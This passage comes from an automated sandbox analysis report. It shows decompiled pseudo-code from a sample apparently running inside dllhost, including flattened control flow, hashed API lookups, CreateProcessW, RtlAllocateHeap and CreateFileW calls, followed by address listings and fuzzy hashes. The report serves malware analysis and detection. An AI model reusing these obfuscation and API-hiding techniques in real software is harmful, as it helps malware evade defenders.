								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x00487120
                                                                                0x00487120
                                                                                0x00487120
                                                                                0x00487125
                                                                                0x00487125
                                                                                0x00487125
                                                                                0x00487125
                                                                                0x0048712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00487130
                                                                                0x0048723f
                                                                                0x00487246
                                                                                0x00487248
                                                                                0x00487260
                                                                                0x00487260
                                                                                0x00487266
                                                                                0x00487268
                                                                                0x0048726e
                                                                                0x00487271
                                                                                0x00487276
                                                                                0x00487278
                                                                                0x0048728b
                                                                                0x00487290
                                                                                0x00487290
                                                                                0x00487297
                                                                                0x00487299
                                                                                0x0048729e
                                                                                0x004872a0
                                                                                0x004872b3
                                                                                0x004872b8
                                                                                0x004872b8
                                                                                0x004872c5
                                                                                0x00487136
                                                                                0x00487136
                                                                                0x0048713b
                                                                                0x00487190
                                                                                0x00487195
                                                                                0x00000000
                                                                                0x0048719b
                                                                                0x004871a5
                                                                                0x004871aa
                                                                                0x00000000
                                                                                0x004871aa
                                                                                0x0048713d
                                                                                0x0048713d
                                                                                0x00487184
                                                                                0x00487189
                                                                                0x00000000
                                                                                0x0048713f
                                                                                0x00487144
                                                                                0x0048716e
                                                                                0x00487173
                                                                                0x00000000
                                                                                0x00487146
                                                                                0x00487146
                                                                                0x0048714b
                                                                                0x00000000
                                                                                0x00487151
                                                                                0x00487158
                                                                                0x0048715d
                                                                                0x00000000
                                                                                0x0048715d
                                                                                0x0048714b
                                                                                0x00487144
                                                                                0x0048713d
                                                                                0x0048713b
                                                                                0x00000000
                                                                                0x00487130
                                                                                0x004871b4
                                                                                0x004871b9
                                                                                0x00487207
                                                                                0x0048720c
                                                                                0x00000000
                                                                                0x0048720e
                                                                                0x00487218
                                                                                0x0048721d
                                                                                0x00000000
                                                                                0x0048721d
                                                                                0x004871bb
                                                                                0x004871bb
                                                                                0x004871f8
                                                                                0x004871fd
                                                                                0x00000000
                                                                                0x004871bd
                                                                                0x004871bd
                                                                                0x004871c2
                                                                                0x004871df
                                                                                0x004871e4
                                                                                0x00000000
                                                                                0x004871c4
                                                                                0x004871c4
                                                                                0x004871c9
                                                                                0x00000000
                                                                                0x004871cb
                                                                                0x004871cb
                                                                                0x00000000
                                                                                0x004871cb
                                                                                0x004871c9
                                                                                0x004871c2
                                                                                0x004871bb
                                                                                0x00000000
                                                                                0x00487227
                                                                                0x00487227
                                                                                0x00487227
                                                                                0x00487232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,004868AC), ref: 00487266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Dry9$Dry9
                                                                                • API String ID: 1029625771-121480178
                                                                                • Opcode ID: a9dfa365f8032d6b3aaf3dda42931ff0ea85fc48eb216d0a37d59ef9a1e7d5c1
                                                                                • Instruction ID: 66106714440e131fab14b10a8e93016a10e6ad252dfb3435b535883a5325fca6
                                                                                • Opcode Fuzzy Hash: a9dfa365f8032d6b3aaf3dda42931ff0ea85fc48eb216d0a37d59ef9a1e7d5c1
                                                                                • Instruction Fuzzy Hash: 7B316420B1D10043DA28FABA58B572F11A6DBA1708B744C6FF661CBB95DE2DCD02539E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00484B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 409 484b70-484b80 410 484b9d-484bba 409->410 411 484b82-484b98 call 483f00 call 483e60 409->411 416 484bbc-484bd2 call 483f00 call 483e60 410->416 417 484bd7-484bf5 CreateProcessW 410->417 411->410 416->417 419 484c73-484c7a 417->419 420 484bf7-484bfd 417->420 423 484bff-484c13 420->423 424 484c14-484c1b 420->424 426 484c38-484c45 424->426 427 484c1d-484c33 call 483f00 call 483e60 424->427 432 484c62-484c72 426->432 433 484c47-484c5d call 483f00 call 483e60 426->433 427->426 433->432
                                                                                C-Code - Quality: 60%
                                                                                			E00484B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x48ddc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E00483E60(__ebx, E00483F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x48ddc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x48e21c == 0) {
					 *0x48e21c = E00483E60(_t26, E00483F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x48de3c;
						if(_t15 == 0) {
							_t15 = E00483E60(_t26, E00483F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x48de3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x48de3c;
						if(_t17 == 0) {
							_t17 = E00483E60(_t26, E00483F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x48de3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x00484b70
                                                                                0x00484b70
                                                                                0x00484b70
                                                                                0x00484b79
                                                                                0x00484b7c
                                                                                0x00484b80
                                                                                0x00484b93
                                                                                0x00484b98
                                                                                0x00484b98
                                                                                0x00484ba6
                                                                                0x00484bb0
                                                                                0x00484bba
                                                                                0x00484bd2
                                                                                0x00484bd2
                                                                                0x00484bf1
                                                                                0x00484bf5
                                                                                0x00484c7a
                                                                                0x00484bf7
                                                                                0x00484bfd
                                                                                0x00484c14
                                                                                0x00484c1b
                                                                                0x00484c2e
                                                                                0x00484c33
                                                                                0x00484c33
                                                                                0x00484c3c
                                                                                0x00484c3e
                                                                                0x00484c45
                                                                                0x00484c58
                                                                                0x00484c5d
                                                                                0x00484c5d
                                                                                0x00484c66
                                                                                0x00484c72
                                                                                0x00484bff
                                                                                0x00484bff
                                                                                0x00484c05
                                                                                0x00484c13
                                                                                0x00484c13
                                                                                0x00484bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00484BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: 81c958e9da2a8879cf02a5c6eb3d42429ab00e65b50655f7c91029f3d66e7f89
                                                                                • Instruction ID: a3eca53ba68eb1e417b8d2c88278621106861b52fe4b98cc26bf266b9453b320
                                                                                • Opcode Fuzzy Hash: 81c958e9da2a8879cf02a5c6eb3d42429ab00e65b50655f7c91029f3d66e7f89
                                                                                • Instruction Fuzzy Hash: BC218030B012025BEB14BF7EDC51B7F37AAABD0B04F00482EB654CA390FA78D9058799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004830A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 523 4830a0-4830b6 524 4830ba-4830bf 523->524 525 4830c0-4830c5 524->525 526 4830cb 525->526 527 483201-483206 525->527 528 4831ed-4831f1 526->528 529 4830d1-4830d6 526->529 530 483208-48320d 527->530 531 483245-48324c 527->531 532 4832f6-483300 528->532 533 4831f7-4831fc 528->533 534 4831da-4831e8 529->534 535 4830dc-4830e1 529->535 536 4832ab-4832b3 530->536 537 483213-483218 530->537 538 483269-483274 531->538 539 48324e-483264 call 483f00 call 483e60 531->539 533->525 534->525 540 4831a0-4831a8 535->540 541 4830e7-4830ec 535->541 544 4832d3-4832f3 536->544 545 4832b5-4832cd call 483f00 call 483e60 536->545 542 48321a-483228 call 483d00 537->542 543 48322d-483232 537->543 556 483291-48329f RtlAllocateHeap 538->556 557 483276-48328c call 483f00 call 483e60 538->557 539->538 550 4831c8-4831d5 540->550 551 4831aa-4831c2 call 483f00 call 483e60 540->551 541->543 548 4830f2-48319b 541->548 542->524 543->525 552 483238-483242 543->552 544->532 545->544 548->524 550->524 551->550 556->532 563 4832a1-4832a6 556->563 557->556 563->524
                                                                                C-Code - Quality: 71%
                                                                                			E004830A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x48e1cc;
										if(_t95 == 0) {
											_t95 = E00483E60(_t93, E00483F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x48e1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x48e494;
							if(_t62 == 0) {
								_t62 = E00483E60(_t93, E00483F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x48e494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x48dd18 == 0) {
								 *0x48dd18 = E00483E60(_t93, E00483F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x48e43c;
								if(_t116 == 0) {
									_t116 = E00483E60(_t93, E00483F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x48e43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E00483D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x004830a2
                                                                                0x004830a6
                                                                                0x004830ac
                                                                                0x004830b1
                                                                                0x004830b6
                                                                                0x004830ba
                                                                                0x004830ba
                                                                                0x004830c0
                                                                                0x004830c0
                                                                                0x004830c0
                                                                                0x004830c0
                                                                                0x004830c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004830cb
                                                                                0x004831f1
                                                                                0x004832f9
                                                                                0x00483300
                                                                                0x004831f7
                                                                                0x004831f7
                                                                                0x00000000
                                                                                0x004831f7
                                                                                0x004830d1
                                                                                0x004830d6
                                                                                0x004831e5
                                                                                0x00000000
                                                                                0x004830dc
                                                                                0x004830e1
                                                                                0x004831a0
                                                                                0x004831a8
                                                                                0x004831c0
                                                                                0x004831c2
                                                                                0x004831c2
                                                                                0x004831ce
                                                                                0x004831d0
                                                                                0x004830ba
                                                                                0x004830ba
                                                                                0x00000000
                                                                                0x004830ba
                                                                                0x004830e7
                                                                                0x004830ec
                                                                                0x00000000
                                                                                0x004830f2
                                                                                0x004830f2
                                                                                0x0048310d
                                                                                0x00483111
                                                                                0x0048311f
                                                                                0x00483123
                                                                                0x00483130
                                                                                0x00483139
                                                                                0x00483147
                                                                                0x0048314b
                                                                                0x00483153
                                                                                0x0048315b
                                                                                0x00483175
                                                                                0x0048317f
                                                                                0x00483187
                                                                                0x0048318b
                                                                                0x00483193
                                                                                0x004830ba
                                                                                0x004830ba
                                                                                0x00000000
                                                                                0x004830ba
                                                                                0x004830ba
                                                                                0x004830ec
                                                                                0x004830e1
                                                                                0x004830d6
                                                                                0x00000000
                                                                                0x004830cb
                                                                                0x00483206
                                                                                0x00483245
                                                                                0x0048324c
                                                                                0x0048325f
                                                                                0x00483264
                                                                                0x00483264
                                                                                0x0048326b
                                                                                0x00483274
                                                                                0x0048328c
                                                                                0x0048328c
                                                                                0x00483299
                                                                                0x0048329b
                                                                                0x0048329f
                                                                                0x00000000
                                                                                0x004832a1
                                                                                0x004832a1
                                                                                0x00000000
                                                                                0x004832a1
                                                                                0x00483208
                                                                                0x0048320d
                                                                                0x004832ab
                                                                                0x004832b3
                                                                                0x004832cb
                                                                                0x004832cd
                                                                                0x004832cd
                                                                                0x004832e4
                                                                                0x004832e6
                                                                                0x004832ed
                                                                                0x004832f0
                                                                                0x004832f3
                                                                                0x00000000
                                                                                0x00483213
                                                                                0x00483218
                                                                                0x00000000
                                                                                0x0048321a
                                                                                0x00483221
                                                                                0x00483223
                                                                                0x004830ba
                                                                                0x004830ba
                                                                                0x00000000
                                                                                0x004830ba
                                                                                0x004830ba
                                                                                0x00483218
                                                                                0x0048320d
                                                                                0x00000000
                                                                                0x0048322d
                                                                                0x0048322d
                                                                                0x00483242
                                                                                0x00000000
                                                                                0x00483242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 00483299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: c8e0f2247b809fe7050beabf575e9272acfc8d4a4aee266febf3a929a62a0641
                                                                                • Instruction ID: 89bbe83a485cb83e73fbbf4fe943f9ff96bb492918812a49f53d8b3427825a34
                                                                                • Opcode Fuzzy Hash: c8e0f2247b809fe7050beabf575e9272acfc8d4a4aee266febf3a929a62a0641
                                                                                • Instruction Fuzzy Hash: 5C51BF71A083018BC718EF6D848452FBBE6EBD4B05F204C2FE551CB351DB79DA49879A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004880A0, Relevance: 3.2, APIs: 2, Instructions: 219fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 574 4880a0-48815b 575 488163-488168 574->575 576 488170-488175 575->576 577 488338-48833d 576->577 578 48817b 576->578 581 48836f-488377 577->581 582 48833f-488344 577->582 579 488181-488186 578->579 580 488287-48829b call 4834c0 578->580 583 48818c-488191 579->583 584 488252-488259 579->584 608 4882bb-4882e3 580->608 609 48829d-4882b5 call 483f00 call 483e60 580->609 588 488379-488391 call 483f00 call 483e60 581->588 589 488397-4883bb CreateFileW 581->589 585 488365-48836a 582->585 586 488346-48834b 582->586 594 4881e3-48821a 583->594 595 488193-488198 583->595 590 48825b-488271 call 483f00 call 483e60 584->590 591 488276-488282 584->591 585->576 596 48834d-488352 586->596 597 4883c7-4883ce 586->597 588->589 592 4883bd-4883c2 589->592 593 4883ee-4883fa 589->593 590->591 591->576 592->576 605 48821c-488232 call 483f00 call 483e60 594->605 606 488237-48824d 594->606 595->596 604 48819e-4881e1 call 48b6e0 595->604 596->576 607 488358-488364 596->607 602 4883eb-4883ec CloseHandle 597->602 603 4883d0-4883e6 call 483f00 call 483e60 597->603 602->593 603->602 604->576 605->606 606->576 626 488300-48830b 608->626 627 4882e5-4882fb call 483f00 call 483e60 608->627 609->608 638 488328-488333 626->638 639 48830d-488323 call 483f00 call 483e60 626->639 627->626 638->575 639->638
                                                                                C-Code - Quality: 71%
                                                                                			E004880A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				void* _t73;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t96;
				intOrPtr _t101;
				char _t105;
				signed int _t122;
				void* _t125;
				void* _t127;
				void* _t128;
				signed int* _t129;
				void* _t131;

				_t122 = __edx;
				_t129 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t128 = _v584;
				_t96 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t131 = _t58 - 0xea5411f;
							if(_t131 > 0) {
								break;
							}
							if(_t131 == 0) {
								_t73 = E004834C0(0x48d970);
								_t122 =  *0x48e158;
								_t127 = _t73;
								if(_t122 == 0) {
									_t122 = E00483E60(_t96, E00483F00(0xc6fbcd74), 0xba71dd03, _t128);
									 *0x48e158 = _t122;
								}
								_t101 =  *0x48e54c; // 0x50dff0
								_t50 = _t101 + 0x260; // 0x50e250
								_t51 = _t101 + 0x18; // 0x50e008
								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
								_t78 =  *0x48e494;
								_t129 =  &(_t129[5]);
								if(_t78 == 0) {
									_t83 = E00483F00(0x9bab0b12);
									_t122 = 0x7facde30;
									_t78 = E00483E60(_t96, _t83, 0x7facde30, _t128);
									 *0x48e494 = _t78;
								}
								_t125 =  *_t78();
								_t80 =  *0x48df30;
								if(_t80 == 0) {
									_t82 = E00483F00(0x9bab0b12);
									_t122 = 0x5010a54d;
									_t80 = E00483E60(_t96, _t82, 0x5010a54d, _t128);
									 *0x48df30 = _t80;
								}
								 *_t80(_t125, 0, _t127);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t86 =  *0x48e1d4;
									if(_t86 == 0) {
										_t88 = E00483F00(0x9bab0b12);
										_t122 = 0xa229df38;
										_t86 = E00483E60(_t96, _t88, 0xa229df38, _t128);
										 *0x48e1d4 = _t86;
									}
									 *_t86( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t89 = _v568;
										_t105 = _v572;
										_v560 = _t89;
										_v552 = _t89;
										_v544 = _t89;
										_v536 = _t89;
										_t90 =  *0x48dee4;
										_v564 = _t105;
										_v556 = _t105;
										_v548 = _t105;
										_v540 = _t105;
										_v532 = 0;
										if(_t90 == 0) {
											_t92 = E00483F00(0x9bab0b12);
											_t122 = 0x4bf45878;
											_t90 = E00483E60(_t96, _t92, 0x4bf45878, _t128);
											 *0x48dee4 = _t90;
										}
										 *_t90(_t128, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t96 =  !=  ? 1 : _t96;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E0048B6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t122;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x48de04 == 0) {
								_t66 = E00483F00(0x9bab0b12);
								_t122 = 0xb66d748a;
								 *0x48de04 = E00483E60(_t96, _t66, 0xb66d748a, _t128);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t128 = _t64;
							if(_t128 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									if( *0x48de3c == 0) {
										 *0x48de3c = E00483E60(_t96, E00483F00(0x9bab0b12), 0x20de7595, _t128);
									}
									CloseHandle(_t128); // executed
									L34:
									return _t96;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t96;
					goto L35;
				}
			}













































                                                                                0x004880a0
                                                                                0x004880a0
                                                                                0x004880a6
                                                                                0x004880ae
                                                                                0x004880b3
                                                                                0x004880bb
                                                                                0x004880c3
                                                                                0x004880ca
                                                                                0x004880ce
                                                                                0x004880d2
                                                                                0x004880d9
                                                                                0x004880e0
                                                                                0x004880e7
                                                                                0x004880ee
                                                                                0x004880f5
                                                                                0x004880fc
                                                                                0x00488103
                                                                                0x00488112
                                                                                0x00488116
                                                                                0x00488119
                                                                                0x0048811d
                                                                                0x00488125
                                                                                0x00488133
                                                                                0x00488137
                                                                                0x0048813f
                                                                                0x00488147
                                                                                0x0048814f
                                                                                0x00488153
                                                                                0x0048815b
                                                                                0x00488163
                                                                                0x00488163
                                                                                0x00488168
                                                                                0x00488170
                                                                                0x00488170
                                                                                0x00488170
                                                                                0x00488170
                                                                                0x00488175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0048817b
                                                                                0x0048828c
                                                                                0x00488291
                                                                                0x00488297
                                                                                0x0048829b
                                                                                0x004882b3
                                                                                0x004882b5
                                                                                0x004882b5
                                                                                0x004882bb
                                                                                0x004882c1
                                                                                0x004882c8
                                                                                0x004882d7
                                                                                0x004882d9
                                                                                0x004882de
                                                                                0x004882e3
                                                                                0x004882ea
                                                                                0x004882ef
                                                                                0x004882f6
                                                                                0x004882fb
                                                                                0x004882fb
                                                                                0x00488302
                                                                                0x00488304
                                                                                0x0048830b
                                                                                0x00488312
                                                                                0x00488317
                                                                                0x0048831e
                                                                                0x00488323
                                                                                0x00488323
                                                                                0x0048832c
                                                                                0x0048832e
                                                                                0x00000000
                                                                                0x00488181
                                                                                0x00488186
                                                                                0x00488252
                                                                                0x00488259
                                                                                0x00488260
                                                                                0x00488265
                                                                                0x0048826c
                                                                                0x00488271
                                                                                0x00488271
                                                                                0x0048827b
                                                                                0x0048827d
                                                                                0x00000000
                                                                                0x0048818c
                                                                                0x00488191
                                                                                0x004881e3
                                                                                0x004881e7
                                                                                0x004881eb
                                                                                0x004881ef
                                                                                0x004881f3
                                                                                0x004881f7
                                                                                0x004881fb
                                                                                0x00488200
                                                                                0x00488204
                                                                                0x00488208
                                                                                0x0048820c
                                                                                0x00488210
                                                                                0x0048821a
                                                                                0x00488221
                                                                                0x00488226
                                                                                0x0048822d
                                                                                0x00488232
                                                                                0x00488232
                                                                                0x00488241
                                                                                0x00488245
                                                                                0x0048824a
                                                                                0x00000000
                                                                                0x00488193
                                                                                0x00488198
                                                                                0x00000000
                                                                                0x0048819e
                                                                                0x004881a0
                                                                                0x004881a8
                                                                                0x004881c4
                                                                                0x004881c8
                                                                                0x004881d4
                                                                                0x004881d8
                                                                                0x004881dd
                                                                                0x00000000
                                                                                0x004881dd
                                                                                0x00488198
                                                                                0x00488191
                                                                                0x00488186
                                                                                0x00000000
                                                                                0x0048817b
                                                                                0x0048833d
                                                                                0x00488377
                                                                                0x0048837e
                                                                                0x00488383
                                                                                0x00488391
                                                                                0x00488391
                                                                                0x004883b4
                                                                                0x004883b6
                                                                                0x004883bb
                                                                                0x00000000
                                                                                0x004883bd
                                                                                0x004883bd
                                                                                0x00000000
                                                                                0x004883bd
                                                                                0x0048833f
                                                                                0x00488344
                                                                                0x00488365
                                                                                0x00000000
                                                                                0x00488346
                                                                                0x0048834b
                                                                                0x004883ce
                                                                                0x004883e6
                                                                                0x004883e6
                                                                                0x004883ec
                                                                                0x004883f1
                                                                                0x004883fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0048834b
                                                                                0x00488344
                                                                                0x00000000
                                                                                0x0048834d
                                                                                0x0048834d
                                                                                0x00488364
                                                                                0x00000000
                                                                                0x00488364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 004883B4
                                                                                • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 004883EC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
